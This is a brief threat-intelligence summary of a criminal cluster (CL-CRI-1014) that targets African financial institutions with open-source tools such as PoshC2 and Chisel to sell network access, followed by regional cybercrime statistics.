Cybercriminals are actively targeting African financial institutions using open-source tools to establish footholds and sell network access to other threat actors. Palo Alto Networks Unit 42 tracks this activity as CL-CRI-1014, with attacks observed since July 2023.
Attack Methodology
The threat actor employs a consistent strategy:
1. Initial Access: Gains entry through unclear methods, then deploys tools like PsExec for remote machine access.
2. Tool Deployment: Uses:
• PoshC2: Open-source command-and-control framework for reconnaissance.
• Chisel: Tunneling utility to bypass firewalls and spread malware internally.
• Classroom Spy: Legitimate remote administration tool repurposed for malicious control.
3. Evasion Tactics: Forges file signatures of legitimate applications to disguise malicious activities.
Motivations and Impact
Attackers are using an Initial Access Broker (IAB) Model. The primary goal is to compromise networks and sell access on dark web markets to other criminals. Financial institutions across Africa, exploiting inadequate cybersecurity controls identified in World Bank assessments. These attacks align with Interpol’s 2025 findings, where cybercrime accounts for >30% of reported crime in parts of Africa, driven by ransomware, phishing, and BEC scams.
Regional Cybersecurity Challenges
African financial sectors face systemic vulnerabilities. Only 30% of African countries have cyber-incident reporting systems, and the threat landscape is dominated by organized crime and nation-states targeting payment systems, alongside ransomware and data theft. 86% of African countries report poor international cooperation against cybercrime.
